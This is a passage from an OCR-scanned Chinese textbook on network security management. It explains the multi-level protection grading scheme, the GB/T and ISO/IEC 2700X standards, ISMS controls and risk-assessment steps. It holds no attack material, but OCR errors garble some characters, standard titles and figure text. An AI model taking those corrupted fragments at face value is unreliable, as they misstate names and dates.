要 求 , 物 联网 安全 扩展 要 求 .工业 控 制 安 全 扩展 要 求 .大 数据 安全 扩展 要 求 ) 两 部 分 。 安 全 
通用 要 求 针对 共性 化 保护 需求 ,等 级 保护 对 象 必须 实现 相应 级 别 的 安全 通用 要 求 ; 安 全 扩 
展 要 求 针 对 个 性 化 保护 需求 ,等 级 保护 对 象 根据 安全 保护 等 级 ,基于 使 用 的 特定 技术 或 特 
定 应 用 场景 选择 性 实现 。 

GB/T 22240 一 2020《 信 息 安全 技术 网 络 安全 等 级 保护 定 级 指南 ) 规 定 了 等 级 保护 定 
级 的 对 象 , 依 据 、 流 程 和 方法 以 及 等 级 变更 等 内 容 , 同 各 行业 发 布 的 定 级 实施 细则 共同 用 
于 指导 开展 等 级 保护 定 级 工作 。 

GB/T 25058 一 2019《 信 息 安全 技术 网 络 安 全 等 级 保护 实施 指南 ) 和 GB/T 25070 一 
2019《 信 息 安全 技术 网 络 安全 等 级 保护 安全 设计 技术 要 求 》( 以 下 简称 设计 要 求 ) 构 成 了 
指导 等 级 保护 对 象 安全 建设 整改 的 方法 指导 类 标准 。 前 者 阐述 了 在 系统 建设 . 运 维和 废 
止 等 各 个 生命 周期 阶段 中 如 何 按照 网 络 安全 等 级 保护 政策 .标准 要 求实 施 等 级 保护 工作 ; 
后 者 提出 了 网 络 安全 等 级 保护 安全 设计 的 技术 要 求 ,包括 安全 计算 环境 、 安 全 区 域 边界 、 
安全 通信 和 网络、 安全 管理 中 心 等 各 方面 的 要 求 。 与 基本 要 求 对 应 ,设计 要 求 针 对 共性 安全 
保护 目标 提出 通用 的 安全 设计 技术 要 求 , 针 对 移动 云 计算 .移动 互联 、 物 联网 .工业 控制 和 
大 数据 等 新 技术 、 新 应 用 领域 的 特殊 安全 保护 目标 提出 特殊 的 安全 设计 技术 要 求 。 

GB/T 28448 一 2019《 信 息 安全 技术 网 络 安 全 等 级 保护 测评 要 求 》) 和 GB/T 28449 一 
iq 息 安全 技术 网 络 安全 等 级 保护 测评 过 程 指南 ) 构 成 了 指导 开展 等 级 测评 的 标准 

。 前 者 阐述 了 等 级 测评 的 原则 ,测评 内 容 、 测 评 强 度 、 单 项 测评 、 整 体 测评 ,测评 结论 
E 2x udis ht 
测评 、 分 析 与 报告 编制 等 各 个 活动 的 工作 任务 、 分 析 方法 和 工作 结果 等 。 

以 上 各 标准 构成 了 开展 等 级 保护 工作 的 管理 .技术 等 各 个 方面 的 标准 体系 。 


2. 等 级 保护 主要 要 求 

CD 定 级 方法 

等 级 保护 对 象 的 定 级 要 素 包括 受 侵害 的 客体 和 对 客体 的 侵害 程度 。 其 中 , 受 侵 害 的 
客体 包括 : 公民 ,法 人 和 其 他 组 织 的 合法 权益 ;社会 秩序 .公共 利益 ;国家 安全 。 确 定 受 侵 
害 的 客体 时 ,应 首先 判断 是 否 侵害 国家 安全 ,然后 判断 是 否 侵害 社会 秩序 或 公众 利益 ,最 
后 判断 是 否 侵害 公民 、 法 人 和 其 他 组 织 的 合法 权益 。 对 客体 的 侵害 程度 归结 为 以 下 3 种 : 
造成 一 般 损 害 、 造 成 严重 损害 、 造 成 特别 严重 损害 。 

等 级 保护 对 象 的 安全 保护 等 级 分 为 以 下 五 级 : 

(D 第 一 级 : 等 级 保护 对 象 受到 破坏 后 .会 对 公民 、 法 人 和 其 他 组 织 的 合法 权益 造成 
一 般 损害 ,但 不 危害 国家 安全 、 社 会 秩序 和 公共 利益 

@ 第 二 级 : 等 级 保护 对 象 受到 破坏 后 ， 会 对 公民 、 法 人 和 其 他 组 织 的 合法 权益 造成 
严重 损害 或 特别 严重 损害 ,或 者 对 社会 秩序 和 公共 利益 造成 危害 ,但 不 危害 国家 安全 。 
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@ 第 三 级 : 等 级 保护 对 象 受到 破坏 后 ,会 对 社会 秩序 和 公共 利益 造成 严重 危害 ,或 
者 对 国家 安全 造成 危害 。 

@ 第 四 级 : 等 级 保护 对 象 受到 破坏 后 ,会 对 社会 秩序 和 公共 利益 造成 特别 严重 危 
害 , 或 者 对 国家 安全 造成 严重 危害 。 

C) 第 五 级 ,等 级 保护 对 象 受到 破坏 后 ,会 对 国家 安全 造成 特别 严重 危害 。 

定 级 要 素 与 安全 保护 等 级 的 关系 如 表 3-8 所 示 。 


表 3-8 定 级 要 素 与 安全 保护 等 级 的 关系 


对 客体 的 侵害 程度 
受 侵害 的 客体 i 
一 般 损害 严重 损害 特别 严重 损害 
公民 ,法 人 和 其 他 组 织 的 合法 权益 第 一 级 第 二 级 第 三 级 
社会 秩序 .公共 利益 第 二 级 第 三 级 第 四 级 
国家 安全 第 三 级 第 四 级 第 五 级 


定 级 对 象 的 安全 主要 包括 业务 信息 安全 和 系统 服务 安全 两 方面 ,与 之 相关 的 受 侵害 
客体 和 对 客体 的 侵害 程度 可 能 不 同 。 因 此 ,其 安全 保护 等 级 从 业务 信息 安全 保护 等 级 和 
业务 服务 安全 保护 等 级 两 个 角度 确定 。 定 级 的 一 般 流程 如 图 3-26 所 示 。 


1. 确定 定 级 对 象 


2. 确定 业务 信息 安全 受到 5. 确定 系统 服务 安全 受到 
破坏 时 所 侵害 的 客体 破坏 时 所 侵害 的 客体 


Y Y 
3. 综合 评定 对 客体 的 6. 综合 评定 对 客体 的 
侵害 程度 侵害 程度 


Y Y 
4. 业务 信息 安全 等 级 7. 系统 服务 安全 等 级 


业务 信息 安全 保护 等 级 
和 系统 服务 安全 保护 
等 级 的 较 高 者 


8. 确定 定 级 对 象 的 
安全 保护 等 级 


图 3-26 ” 定 级 方法 流程 示意 图 


(2) 安全 设计 技术 要 求 
等 级 保护 对 象 安全 保护 设计 包括 对 各 级 系统 安全 保护 环境 的 设计 及 其 安全 互联 的 设 
计 , 如 图 3-27 所 示 。 各 级 系统 安全 保护 环境 由 相应 级 别 的 安全 计算 环境 、 安 全 区 域 边界 、 
安全 通信 和 网络 和 (或 ) 安 全 管理 中 心 组 成 。 定 级 系统 安全 互联 由 安全 互联 部 件 和 跨 系统 安 
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全 管理 中 心 组 成 。 

安全 计算 环境 是 对 定 级 系统 的 信息 存储 与 处 理 进行 安全 保护 的 部 件 。 计 算 环 境 由 定 
级 系统 中 完成 信息 存储 与 处 理 的 计算 机 系统 硬件 和 系统 软件 以 及 外 部 设备 及 其 联接 部 件 
组 成 ,也 可 以 是 单一 的 计算 机 系统 。 

安全 区 域 边界 是 对 定 级 系统 的 安全 计算 环境 的 边界 ,以 及 安全 计算 环境 与 安全 通信 
网 络 之 间 实 现 连 接 功 能 进行 安全 保护 的 部 件 。 安 全 保护 主要 指 对 安全 计算 环境 以 及 进出 
安全 计算 环境 的 信息 进行 保护 。 

安全 通信 网 络 是 对 定 级 系统 安全 计算 环境 之 间 进 行 信息 传输 实施 安全 保护 的 部 件 。 

安全 管理 中 心 是 定 级 系统 的 安全 策略 及 安全 计算 环境 .安全 区 域 边界 和 安全 通信 网 
络 上 的 安全 机 制 实施 统一 管理 的 平台 。 第 二 级 及 第 二 级 以 上 的 系统 安全 保护 环境 通常 需 
要 设置 安全 管理 中 心 。 

不 同 级 别 的 等 级 保护 安全 技术 之 间 存 在 着 层 层 嵌 套 的 关系 ,从 第 一 级 开始 ,每 一 级 在 
继承 其 低 一 级 别 所 有 安全 要 求 的 基础 上 ,增补 一 些 安全 要 求 ,或 对 上 一 级 别 的 特定 安全 要 
求 有 所 加 强 。 每 一 级 都 有 自己 的 安全 防护 目标 以 及 对 应 的 关键 技术 。 

CD 第 一 级 系统 为 用 户 自主 保护 级 ,其 核心 技术 为 自主 访问 控制 。 其 设计 目标 是 实现 
定 级 系统 的 自主 访问 控制 ,使 系统 用 户 对 其 所 属 客体 具有 自我 保护 的 能 力 。 

Q 第 二 级 的 关键 技术 为 审计 。 相 比 第 一 级 .本 级 要 实施 一 个 粒度 更 细 的 自主 访问 控 
制 ,并 通过 登录 规程 .审计 安全 相关 事件 和 隔离 资源 ,提供 对 用 户 行为 追溯 的 能 力 。 

@ 第 三 级 在 第 二 级 系统 安全 保护 环境 的 基础 上 ,通过 实现 基于 安全 策略 模型 和 标记 
的 强制 访问 控制 以 及 增强 系统 的 审计 机 制 , 使 系统 具有 在 统一 安全 策略 管控 下 ,保护 敏感 
资源 的 能 力 ,并 保障 基础 计算 资源 和 应 用 程序 可 信 ,确保 关键 执行 环节 可 信 。 

@ 第 四 级 是 结构 化 保护 级 。 这 一 级 的 安全 功能 要 求 与 第 三 级 基本 相同 ,但 在 安全 保 
障 上 有 所 加 强 ,要 求 通过 结构 化 的 保护 措施 ,有 效 加 强 系统 的 抗 攻 击 能 力 , 达 到 防止 系统 
内 部 具有 一 定 特权 的 编程 高 手 攻击 的 能 力 。 

@ 第 五 级 的 安全 设计 要 求 很 高 ,目前 尚 没有 安全 设计 方案 。 

(3) 测评 方法 

GB/T 28448 一 2019《 信 息 安全 技术 网 络 安全 等 级 保护 测评 要 求 ) 是 用 来 指导 信息 安 
全 测评 服务 机 构 ,等 级 保护 对 象 的 主管 部 门 及 运营 使 用 单位 对 等 级 保护 对 象 安全 等 级 保 
护 状 况 进行 安全 测试 评估 的 标准 文件 。 等 级 保护 测评 框架 由 3 部 分 构成 : 测评 输入 、 测 
评 过 程 和 测评 输出 。 测 评 输入 包括 基本 要 求 的 第 四 级 目录 ( 即 安全 控制 点 的 唯一 标识 符 ) 
和 采用 该 安全 控制 的 信息 系统 的 安全 保护 等 级 ( 含 业务 信息 安全 保护 等 级 和 系统 服务 保 
护 等 级 ) 。 过 程 组 件 为 一 组 与 输入 组 件 中 所 标识 的 安全 控制 相关 的 特定 测评 对 象 和 测评 
方法 ,输出 组 件 包 括 一 组 由 测评 人 员 使 用 的 用 于 确定 安全 控制 有 效 性 的 程序 化 陈述 。 
图 3-28 给 出 了 测评 框架 。 

测评 对 象 是 指 测评 实施 的 对 象 , 即 测评 过 程 中 涉及 的 制度 文档 、 各 类 设备 及 其 安全 配 
置 和 相关 人 员 等 。 每 一 个 被 测 安全 控制 点 均 有 一 组 与 之 相关 的 预先 定义 的 测评 对 象 (如 
制度 文档 、 各 类 设备 及 其 安全 配置 和 相关 人 员 )。 测 评 方法 包括 访谈 ,核查 和 测试 ,测评 人 
员 通 过 这 些 方法 获取 证 据 。 测 评 的 实施 过 程 由 单项 测评 和 整体 测评 两 部 分 构成 。 单 项 测 
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评 是 等 级 测评 工作 的 基本 活动 ,针对 基本 要 求 测评 各 安全 控制 点 。 整 体 测评 是 在 单项 测 
评 的 基础 上 ,通过 进一步 分 析 信息 系统 安全 保护 功能 的 整体 相关 性 ,对 信息 系统 实施 的 综 
合 安 全 测评 ,主要 包括 安全 控制 点 间 、 层 面 间 和 区 域 间 相互 作用 的 安全 测评 。 


测评 方法 
访谈 

核查 测评 规程 (步骤 ) 

ee 测试 访谈 规程 (步骤 ) 

C—» | 核查 规程 (步骤 ) 

测评 对 象 测试 规程 (步骤 ) 

信息 系统 制度 文档 

安全 保护 等 级 各 类 设备 规程 (步骤 ) 说 明 

安全 配置 
测评 输入 相关 人 员 测评 输出 


图 3-28 ”测评 框架 


3.3.2 网络 安全 管理 


1. 网 络 安全 管理 概述 

网 络 安全 管理 是 网 络 安 全 工作 中 的 重要 概念 ,网 络 安 全 管理 控制 措施 与 网 络 安全 技 
术 控 制 措施 一 起 构成 了 网 络 安 全 防护 措施 的 全 部 。 

管理 学 中 ,管理 的 定义 可 以 这 样 理解 : 凡是 有 群体 共同 活动 .共同 劳动 或 共同 工作 
的 地 方 ,都 需要 管理 。 管 理 是 管理 人 员 和 领导 和 组 织 人 们 完成 一 定 的 任务 和 实现 共同 的 目 
标的 一 种 活动 。 毫 无 疑问 的 是 ,任何 一 种 管理 活动 都 必须 明确 谁 来 管 ( 即 管理 主体 ) 、 管 什 
么 ( 即 管理 客体 )、 怎 么 管 ( 即 管理 手段 ,以 规章 制度 为 主 ,管理 对 象 必 须 遵 从 这 些 规章 制 
度 ) 以 及 管 得 怎么 样 (管理 效果 ) 的 问题 。 

“管理 ”的 概念 应 用 到 网 络 安全 领域 , 便 有 了 网 络 安全 管理 的 概念 。 美国 国家 标准 与 
技术 研究 院 (NIST) 将 网 络 安 全 技术 控制 措施 定义 为 完全 由 机 器 来 完成 的 活动 ,网 络 安全 
管理 措施 定义 为 完全 由 人 来 完成 的 活动 ,并 将 由 机 器 和 人 共同 完成 的 活动 定义 成 网 络 安 
全 运行 控制 措施 。 事 实 上 ,后 两 种 都 是 网 络 安全 管理 控制 措施 。 简 言 之 ,网 络 安全 管理 是 
指 把 分 散 的 网 络 安全 技术 因素 和 人 的 因素 ,通过 策略 规则 协调 整合 成 为 一 体 , 服 务 于 网 
络 安全 的 目标 。 

长 期 以 来 ,人 们 保障 系统 安全 的 手段 偏重 于 依靠 技术 .厂商 在 安全 技术 和 产品 的 研发 
上 不 遗 余力 ,新 的 技术 和 产品 不 断 涌现 ;消费 者 也 更 加 相信 安全 产品 ,把 大 部 分 安全 预算 
也 都 投入 到 产品 的 采购 上 。 但 仅仅 依靠 技术 和 产品 保障 网 络 安全 往往 难 尽 如 人 意 ,很 多 
复杂 、 多 变 的 安全 威胁 和 隐患 仅 靠 产品 是 无 法 消除 的 。 此 外 ,复杂 的 网 络 安 全 技术 和 产品 
也 要 在 完善 的 管理 下 才能 发 挥 作用 。 因 此 ,人 们 在 网 络 安全 领域 总 结 出 了 “三 分 技术 ,七 
分 管理 ”的 实践 经 验 和 原则 。 我 国 也 将 “管理 与 技术 并 重 " 作 为 网 络 安全 保障 的 一 项 基本 
原则 。 
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2. 网 络 安全 管理 体系 (ISMS) 

CD 国外 网 络 安 全 管理 相关 标准 

网 络 安全 技术 的 发 展 极 大 地 促进 了 网 络 安 全 管理 理念 的 产生 和 发 展 ,各 种 有 关 网 络 
安全 管理 的 法 规 、 标 准 也 应 运 而 生 。20 世纪 80 年 代 末 , 随 着 ISO 9000 质量 管理 体系 标 
准 的 出 现 及 其 随后 在 全 世界 的 广泛 推广 应 用 ,系统 管理 的 思想 在 网 络 安全 管理 领域 也 得 
到 借鉴 与 采用 ,使 网 络 安 全 管理 在 20 世纪 90 年 代步 人 了 标准 化 与 系统 化 管理 的 时 代 。 
1995 年 ,英国 率先 推出 了 BS 7799 网 络 安全 管理 标准 ,BS 7799 于 2000 年 被 国际 标准 化 
组 织 批准 为 国际 标准 ISO/IEC 17799, 又 于 2005 年 被 国际 标准 化 组 织 重新 编号 , 编 人 网 
络 安全 管理 体系 标准 族 , 即 ISO/IEC 2700X 标准 系列 。 澳 大 利 亚 和 新 西 兰 也 联合 推出 了 
风险 管理 标准 AS/NZS 4360, 德 国联 邦 技术 安全 局 推出 了 《信息 技术 基线 保护 手册 ) 等 。 

目前 ,ISO/IEC 2700X 标准 系列 是 国际 主流 。 国 际 标准 化 组 织 (ISO) 专 门 为 ISMS 
预 留 了 一 批 标准 序号 。 这 一 方面 说 明了 ISO 对 ISMS 的 重视 程度 ,也 说 明了 ISMS 相关 
标准 正在 各 方 实践 的 基础 上 不 断 更 新 和 优化 。 图 3-29 列 出 了 ISO/IEC 2700X 系列 标准 


的 关系 。 
" 27000 
发 概述 和 词汇 
E 27001 27006 
gE 信息 安全 管理 体系 -要 求 信息 安全 管理 体系 审核 认证 机 构 的 要 求 


en 人 


27002 27003 TR 27008 
信息 安全 控制 实践 指南 | 信息 安全 管理 体系 实施 指南 ISMS 控 制 措施 审核 员 指 南 


27004 27007 
信息 安全 管理 体系 测量 信息 安全 管理 体系 审核 指南 


27005 
TR 27016 
信息 安全 风险 管理 
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1 
1 
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1 
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人 


通用 指南 


信息 安全 管理 组 织 经 济 学 
27013 
ISO/IEC 27001 特 定 行业 应 用 .要求 ISO/IEC prece 20000-1 
27014 
27011 27010 
信息 安全 治理 


[| JETF ISO/IEC 27002 的 通信 部 门 间 和 组 织 间 通 信 是 


行业 信息 安全 管理 指南 


I 

1 

I 

27017 1 
27015 1 

基于 ISO/IEC 27002 的 。 || 用 于 金融 服务 的 信息 安全 | 1 
I 

I 

I 

I 

I 

I 

1 

I 

I 


信息 安全 管理 指南 


使 用 云 计算 服务 的 信息 
安全 控制 措施 指南 再 指南 


27019 
Ak T ISO/IEC 27002 的 能 源 行业 过 程控 制 系统 的 信息 
安全 管理 指南 


图 标 : | 要 求 类 标准 | 指南 类 标准 Is 


特定 行业 指 


3-29 ISO/IEC 2700X 系列 标准 关系 图 


该 系列 的 两 个 核心 基础 标准 ISO/IEC 27001 和 ISO/IEC 27002 已 于 2005 4E 10 月 
正式 发 布 第 一 版 ,2013 年 10 月 正式 发 布 第 二 版 。 
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ISO/IEC 27001 是 网 络 安全 管理 体系 (ISMS) 的 规范 说 明 ,其 重要 性 在 于 它 提供 了 认 
证 执行 的 标准 ,上 且 包括 必要 文档 的 列表 。27001 网 络 安全 管理 体系 标准 强调 风险 管理 的 
思想 。 传 统 的 网 络 安 全 管理 基本 上 还 处 在 一 种 静态 的 、 局 部 的 、 少 数 人 负责 的 、 突 击 式 、 事 
后 纠正 式 的 管理 方式 ,导致 的 结果 是 不 能 从 根本 上 避免 .降低 各 类 风险 ,也 不 能 降低 网 络 
安全 故障 导致 的 综合 损失 。 而 27001 标准 基于 风险 管理 的 思想 ,指导 组 织 建立 一 个 系统 
化 ,程序 化 和 文件 化 的 管理 体系 , 即 网 络 安 全 管理 体系 (ISMS)。ISMS 基于 系统 、 全 面 、 
科学 的 安全 风险 评估 ,体现 预防 控制 为 主 的 思想 ,强调 遵守 国家 有 关 网 络 安全 的 法 律 法 规 
及 其 他 合同 方 要 求 ,强调 全 过 程 和 动态 控制 ,本 着 控制 费用 与 风险 平衡 的 原则 合理 选择 安 
全 控制 方式 保护 组 织 所 拥有 的 关键 信息 资产 ,使 网 络 安全 风险 的 发 生 概率 和 结果 降低 到 
可 接受 的 水 平 ,确保 信息 的 保密 性 、 完 整 性 和 可 用 性 ,保持 组 织 业 务 运 作 的 持续 性 。ISO/ 
IEC 27002 提出 了 一 系列 具体 的 网 络 安全 管理 控制 措施 。 
(2) 我 国 网 络 安 全 管理 相关 标准 
在 网 络 安全 管理 标准 的 制定 方面 ,我 国 早期 主要 采用 与 国际 标准 靠拢 的 方式 ,充分 借 
鉴 吸 收 国际 标准 的 长 处 ,近年 来 加 强 了 网 络 安全 管理 标准 的 自主 制定 ,并 已 经 开始 向 国际 
标准 化 组 织 提 交 国 际 标准 提案 ,话语 权 不 断 增强 。 在 全 国信 息 安 全 标准 化 技术 委员 会 内 ， 
第 7 工作 组 (WG7) 主 要 负责 研究 和 制定 适用 于 非 涉 密 、 敏 感 领域 安全 保障 的 通用 安全 管 
理 方法 ,安全 控制 措施 以 及 安全 支撑 和 服务 等 方面 的 标准 、 规 范 及 指南 。 在 WG7 的 努力 
下 ,目前 我 国 已 正式 发 布 的 网 络 安全 管理 标准 主要 有 : 
* GB/T 19715.1—2005(f& E TER. IT 安全 管理 指南 第 1 部 分 : IT 安全 概念 和 模 
型 )( 等 同 采用 ISO/IEC TR 13335 一 1:1996) 。 
* GB/T 19715.2 一 2005《 信 息 技 术 IT 安全 管理 指南 第 2 部 分 : 管理 和 规划 IT X 
全 )( 等 同 采用 ISO/IEC TR 13335 一 2:1997) 。 
* GB/T 20269 一 2006( 信 息 安全 技术 信息 系统 安全 管理 要 求 》。 
* GB/T 28450 一 2012《 信 息 安 全 技术 信息 安全 管理 体系 审核 指南 》。 
* GB/T 28453 一 2012《 信 息 安 全 技术 信息 系统 安全 管理 评估 要 求 》。 
* GB/T 31496 一 2015《 信 息 技术 安全 技术 信息 安全 管理 体系 实施 指南 》。 
。 GB/T 31497 一 2015《 信 息 技术 安全 技术 信息 安全 管理 测量 》。 
。 GB/T 31722 一 2015《 信 息 技术 安全 技术 信息 安全 风险 管理 》。 
* GB/T 22080 一 2016《 信 息 技术 安全 技术 信息 安全 管理 体系 要 求 》( 等 同 采用 
ISO/IEC 27001:2013) 。 
* GB/T 22081 一 2016《 信 息 技 术 安全 技术 信息 安全 管理 实用 规则 》( 等 同 采用 
ISO/IEC 27002:2013). 
* GB/Z 32916 一 2016《 信 息 技术 安全 技术 信息 安全 控制 措施 审核 员 指南 》。 
* GB/T 29246 一 2017《 信 息 技 术 安全 技术 信息 安全 管理 体系 概述 和 词汇 )( 等 同 采 
JH ISO/IEC 27000:2016) 。 
* GB/T 25067 一 2020《 信 息 技术 安全 技术 信息 安全 管理 体系 审核 和 认证 机 构 要 
求 》。 
根据 相关 国际 标准 的 进展 情况 和 网 络 安 全 管理 工作 实际 需求 .上 述 标准 随 着 时 间 发 
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展 正 在 不 断 修订 , 近 几 年 更 是 进入 修订 的 热潮 ,今后 标准 的 年 号 可 能 会 有 所 变化 。 

(3) 网 络 安 全 管理 控制 措施 

为 了 对 组 织 所 面临 的 安全 风险 实施 有 效 的 控制 ,应 针对 具体 的 安全 威胁 和 脆弱 性 , 采 
取 适 当 的 控制 措施 ,包括 管理 手段 和 技术 方法 。ISO/IEC 27002 标准 ( 即 我 国 国家 标准 
GB/T 22081) 提 出 了 14 个 方面 的 管理 控制 措施 。 这 些 管理 控制 措施 在 全 球 产 生 了 重大 
影响 ,已 经 成 为 各 类 网 络 安全 管理 措施 的 基础 。 
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网 络 安全 策略 : 旨 在 对 组 织 中 成 员 阐明 如 何 使 用 组 织 中 的 信息 系统 资源 、 如 何 处 
理 敏 感 信息 、. 如 何 采用 安全 技术 产品 ,用户 在 使 用 信息 时 应 当 承担 哪些 责任 ,详细 
描述 员工 的 安全 意识 与 技能 要 求 , 列 出 被 组 织 禁止 的 行为 。 通 常 包括 一 个 顶层 的 
网 络 安全 方针 和 多 组 围绕 特定 主题 支撑 这 一 方针 的 网 络 安全 策略 集 。 

网 络 安全 组 织 : 描述 如 何 建立 、 运 行 一 个 网 络 安 全 管理 框架 来 开展 安全 管理 , 主 
要 包括 内 部 网 络 安全 组 织 架构 .职能 职责 分 配 ,以 及 如 何 处 理 与 各 相关 方 的 关系 。 
人 力 资源 安全 : 针对 人 员 任 用 前 、 任 用 中 以 及 任用 的 终止 和 变更 3 个 阶段 进行 
管理 。 

资产 管理 : 主要 包括 识别 组 织 资产 并 定义 适当 的 保护 责任 、 依 据 对 组 织 的 重要 程 
度 进行 信息 分 级 ,以 及 保护 存储 在 介质 中 的 信息 。 

访问 控制 : 以 * 未 经 明确 允许 , 则 一 律 禁止 ”为 前 提 , 考 虑 按 需 所 知 、 按 需 使 用 原则 
制定 并 执行 访问 控制 策略 ,保护 系统 、 应 用 及 数据 不 被 未 经 授权 的 非法 访问 。 
密码 : 确保 适当 和 有 效 地 使 用 密码 技术 以 保护 信息 的 保密 性 、 真 实 性 和 完整 性 。 
物理 和 环境 安全 : 包括 工作 场所 的 出 人 控制 要 求 和 信息 处 理 设施 的 管理 要 求 , 旨 
在 防止 信息 和 信息 处 理 设施 受到 未 经 授权 的 物理 访问 、 损 害 和 干扰 ,防止 设备 丢 
失 、 损 坏 或 中 断 。 

运行 安全 : 确保 信息 系统 正确 无 误 地 安全 运行 ,包括 制定 信息 处 理 设备 的 管理 与 


记录 事态 并 生成 证 据 ; 制 定 并 实施 系统 软件 安装 控制 规程 ;建立 有 效 的 技术 脆弱 
性 管理 过 程 ;使 信息 系统 审计 的 有 效 性 最 大 化 ,干扰 最 小 化 等 。 

通信 安全 : 管理 和 控制 网 络 以 保护 系统 、 应 用 中 的 信息 ,保护 支持 性 基础 设施 。 
确保 组 织 内 部 ,组织 与 外 部 实体 间 传 输 信息 的 安全 ,使 其 免 遭 丢失 、 被 修改 或 资 ， 
且 符 合 所 有 相关 的 法 律 法 规 。 


t 系统 获取 、 开 发 和 维护 : 主要 包括 三 方面 要 求 ,一 是 在 开发 的 系统 中 建立 有 效 的 


安全 机 制 ; 二 是 确保 信息 安全 在 信息 系统 开发 和 维护 全 过 程 中 得 到 设计 和 实现 ; 
三 是 保护 用 于 测试 的 数据 。 


。 供应 商 关系 : 制定 针对 供应 商 管理 的 安全 策略 ,保护 可 被 供应 商 访 问 的 组 织 资 


产 , 还 应 在 供应 商 协 议 中 强调 网 络 安全 。 


* 网 络 安全 事件 管理 : 建立 规程 .明确 管理 责任 .确保 采用 一 致 和 有 效 的 方法 对 网 


络 安全 事件 进行 管理 ,包括 对 安全 事态 和 脆弱 性 的 沟通 。 


。 业务 连续 性 管理 的 网 络 安全 方面 : 将 网 络 安全 连续 性 纳入 组 织 的 业务 连续 性 管 


理 之 中 ,防止 安全 活动 中 断 , 确 保 在 发 生 重大 故障 和 灾难 的 情况 下 ,组 织 的 网 络 安 


x 第 3 章 ”网络 安全 基础 ”mm 


全 连续 性 达到 所 要 求 的 级 别 。 
。 符合 性 : 包括 两 方面 要 求 , 一 是 确保 符合 法 律 法 规 、 标 准 、 合 同 义 务 等 要 求 ,二 是 
对 合 规 性 进行 评审 。 


3. 网 络 安全 风险 管理 

CD. 风险 管理 概述 

风险 管理 是 一 种 在 风险 评估 的 基础 上 对 风险 进行 处 理 的 工程 ,网 络 安全 风险 管理 的 
实质 是 基于 风险 的 网 络 安全 管理 。 其 核心 是 网 络 安全 风险 评估 , 即 , 运 用 科学 的 方法 和 手 
段 ,系统 地 分 析 信 息 系 统 所 面临 的 威胁 及 其 存在 的 脆弱 性 ,评估 安全 事件 一 旦 发 生 可 能 造 
成 的 危害 程度 ,提出 有 针对 性 的 抵御 威胁 的 防护 对 策 和 整改 措施 ,为 防范 和 化 解 网 络 安全 
风险 ,将 风险 控制 在 可 接受 的 水 平 .从 而 最 大 限度 地 保障 网 络 安全 提供 科学 依据 。 风 险 管 
理 已 经 成 为 各 种 宏观 的 网 络 安全 保护 方案 的 方法 学 基础 ,等 级 保护 、 网 络 安 全 管理 体系 等 
多 次 提 到 风险 评估 的 概念 ,网 络 安全 工程 方法 中 ,也 运用 风险 管理 的 方法 确定 用 户 的 安全 
保护 需求 。 

本 部 分 以 国家 标准 GB/T 20984 一 2007 信 息 安全 技术 信息 安全 风险 评估 规范 ) 为 基 
础 对 风险 管理 的 主要 知识 进行 介绍 。ISO/IEC 27002 中 的 各 项 网 络 安全 管理 控制 措施 ， 
都 是 针对 系统 中 可 能 存在 的 风险 点 进行 控制 。 而 建立 ISMS 的 过 程 ,就 是 对 安全 风险 进 
行 评估 ,继而 从 ISO/IEC 27002 中 选择 控制 措施 的 具体 实践 。 

(2) 风险 管理 实施 流程 

风险 管理 主要 包括 资产 识别 ,威胁 识别 .脆弱 性 级 别 . 已 有 安全 措施 的 确认 、 风 险 计 
算 、 风 险 处 理 等 过 程 ,如 图 3-30 所 示 。 

风险 管理 的 核心 部 分 是 风险 分 析 , 即 定量 或 定性 计算 安全 风险 的 过 程 ,其 原理 如 图 3-31 
所 示 。 风 险 分 析 主 要 涉及 资产 ,威胁 .脆弱 性 三 个 基本 要 素 。 每 个 要 素 有 各 自 的 属性 , 资 
产 的 属性 是 资产 价值 ;威胁 的 属性 可 以 是 威胁 主体 .影响 对 象 . 出 现 频率 、 动 机 等 ;脆弱 性 
的 属性 是 资产 弱点 的 严重 程度 。 风 险 分 析 的 主要 内 容 如 下 : 

CD 对 资产 进行 识别 .分 类 ,然后 对 每 项 资产 的 保密 性 .完整 性 和 可 用 性 进行 赋值 ,在 
此 基础 上 评价 资产 的 重要 性 。 综 合 评定 方法 可 以 根据 自身 的 特点 ,选择 对 资产 保密 性 、 完 
整 性 和 可 用 性 最 为 重要 的 一 个 属性 的 赋值 等 级 作为 资产 的 最 终 赋值 结果 ;也 可 以 根据 资 
产 保密 性 、 完 整 性 和 可 用 性 的 不 同等 级 对 其 赋值 进行 加 权 计 算得 到 资产 的 最 终 赋值 结果 ， 
加 权 方 法 可 根据 组 织 的 业务 特点 确定 。 

@ 对 威胁 进行 识别 ,描述 威胁 的 属性 ,并 对 威胁 出 现 的 频率 赋值 ,评估 频率 时 需要 综 
合 考 虑 以 下 三 个 方面 : 以 往 安全 事件 报告 中 出 现 过 的 威胁 及 其 频率 的 统计 ;实际 环境 中 
通过 检测 工具 以 及 各 种 日 志 发 现 的 威胁 及 其 频率 的 统计 ; 近 一 两 年 来 国际 组 织 发 布 的 对 
于 整个 社会 或 特定 行业 的 威胁 及 其 频率 统计 ,以 及 发 布 的 威胁 预警 。 

@ 对 脆弱 性 进行 识别 ,并 根据 脆弱 性 对 资产 的 暴露 程度 、 技 术 实 现 的 难 易 程 度 、 流 行 
程度 等 对 具体 资产 的 脆弱 性 的 严重 程度 赋值 。 

@ 根据 威胁 及 威胁 利用 脆弱 性 的 难 易 程 度 判 断 安 全 事件 发 生 的 可 能 性 。 

C) 根据 脆弱 性 的 严重 程度 及 安全 事件 所 作用 的 资产 的 价值 计算 安全 事件 造成 的 
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图 3-31 风险 分 析 原 理 图 


损失 。 

@ 根据 安全 事件 发 生 的 可 能 性 以 及 安全 事件 出 现 后 的 损失 ,计算 安全 事件 一 旦 发 生 
对 组 织 的 影响 , 即 风险 值 。 

(3) 风险 控制 

风险 处 理 也 称 风险 控制 ,是 在 综合 考虑 成 本 与 效益 的 前 提 下 ,通过 安全 措施 来 控制 风 
险 ,使 残余 风险 降低 到 可 接受 的 程度 .这 是 网 络 安全 保护 的 实质 。 因 为 ,如 果 安 全 措施 的 
成 本 超出 了 实施 安全 措施 、 控 制 风险 后 可 能 带 来 的 效益 ,那么 这 种 安全 措施 便 失 去 了 意 
义 。 由 于 任何 网 络 和 信息 系统 都 会 有 安全 风险 ,人 们 追求 的 所 谓 安 全 的 网 络 和 信息 系统 ， 
实际 是 指 网 络 和 信息 系统 在 实施 了 风险 评估 并 做 出 风险 控制 后 ,仍然 存在 的 残余 风险 可 
被 接受 的 网 络 和 信息 系统 。 因 此 ,不 存在 绝对 安全 的 网 络 和 信息 系统 ( 即 * 零 ”风险 的 网 络 
